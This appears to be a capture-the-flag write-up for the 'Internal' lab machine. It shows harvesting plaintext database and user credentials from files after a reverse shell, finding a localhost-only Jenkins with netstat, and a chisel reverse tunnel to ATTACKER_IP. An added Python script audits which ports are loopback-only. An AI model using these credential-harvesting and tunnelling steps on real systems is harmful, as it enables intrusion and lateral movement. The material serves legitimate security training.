Internal
Server Enumeration
- We can catch the reverse shell from WordPress using netcat.
www-data@internal /$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
- This configuration file contains the phpMyAdmin credentials: /etc/phpmyadmin/config-db.php
- phpmyadmin : B2Ud4fEOZmVq
- [NOTE] PHPMyAdmin is a Rabbit Hole.
$dbuser='phpmyadmin';
$dbpass='B2Ud4fEOZmVq';
- File: /opt/wp-save.txt
- Contains the credentials of the user aubreanna: aubreanna:bubb13guM!@#123
www-data@internal /$ cat /opt/wp-save.txt
Bill,
Aubreanna needed these credentials for something later.
Let her know you have them and where they are.
aubreanna:bubb13guM!@#123
Tunneling
- Switching to User: aubreanna
- With further Enumeration we find that Jenkins is running Locally [LOCAL:8080]
- We can use either SSH tunneling or chisel as a TCP/UDP tunnel.
aubreanna@internal:~$ id
uid=1000(aubreanna) gid=1000(aubreanna) groups=1000(aubreanna),4(adm),24(cdrom),30(dip),46(plugdev)
aubreanna@internal:~$ ls -l
total 12
-rwx------ 1 aubreanna aubreanna 55 Aug 3 2020 jenkins.txt
drwx------ 3 aubreanna aubreanna 4096 Aug 3 2020 snap
aubreanna@internal:~$ cat jenkins.txt
Internal Jenkins service is running on 172.17.0.2:8080
aubreanna@internal:~$ netstat -netulp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 111 23071 -
tcp 0 0 127.0.0.1:35053 0.0.0.0:* LISTEN 0 23056 -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN 0 24180 -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 101 18568 -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 0 22230 -
tcp6 0 0 :::80 :::* LISTEN 0 22553 -
tcp6 0 0 :::22 :::* LISTEN 0 22246 -
udp 0 0 127.0.0.53:53 0.0.0.0:* 101 18567 -
udp 0 0 10.10.90.155:68 0.0.0.0:* 100 18382 -
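The listener table above is the whole reason a tunnel is needed: Jenkins (8080) and MySQL (3306) are bound to 127.0.0.1 only, while 22 and 80 face the network. As an added example (not from the original writeup), this Python script parses that `netstat -netulp` output, quoted inline as sample input, and reports which ports are reachable only from the host itself, the same check an administrator can script to audit what a box exposes versus keeps local.

```python
from collections import namedtuple

# Sample input: the `netstat -netulp` listener rows quoted from the session above.
NETSTAT_OUTPUT = """\
Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 111 23071 -
tcp 0 0 127.0.0.1:35053 0.0.0.0:* LISTEN 0 23056 -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN 0 24180 -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 101 18568 -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 0 22230 -
tcp6 0 0 :::80 :::* LISTEN 0 22553 -
tcp6 0 0 :::22 :::* LISTEN 0 22246 -
udp 0 0 127.0.0.53:53 0.0.0.0:* 101 18567 -
udp 0 0 10.10.90.155:68 0.0.0.0:* 100 18382 -
"""

# scope is "loopback", "all-interfaces" or "specific"; uid is the User column (0 = root).
Listener = namedtuple("Listener", "proto addr port uid scope")

def split_endpoint(endpoint: str) -> tuple[str, int]:
    """Split 'addr:port' on the last colon so IPv6 forms like ':::80' parse correctly."""
    addr, _, port = endpoint.rpartition(":")
    return addr, int(port)

def classify(addr: str) -> str:
    """Bind scope of a local address; loopback is unreachable from the network."""
    if addr.startswith("127.") or addr == "::1":
        return "loopback"
    if addr in ("0.0.0.0", "::"):
        return "all-interfaces"
    return "specific"

def parse_netstat(text: str) -> list[Listener]:
    listeners = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0] not in ("tcp", "tcp6", "udp", "udp6"):
            continue  # skip the header and any non-socket row
        # UDP rows have no State column, so take User/Inode/PID from the right end.
        uid = int(fields[-3])
        addr, port = split_endpoint(fields[3])
        listeners.append(Listener(fields[0], addr, port, uid, classify(addr)))
    return listeners

def local_only_ports(listeners: list[Listener]) -> set[int]:
    """Ports bound only on loopback: reachable from the host, not from the network."""
    exposed = {l.port for l in listeners if l.scope != "loopback"}
    return {l.port for l in listeners if l.scope == "loopback"} - exposed
```

Run `local_only_ports(parse_netstat(NETSTAT_OUTPUT))` to get the set of ports that a remote client can only reach through a forward on the host.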
Chisel
- Transfer the chisel binary to the target machine.
- Server (attacker machine):
chisel server --reverse --port 8000
- Target (client):
chisel client ATTACKER_IP:8000 R:8080:127.0.0.1:8080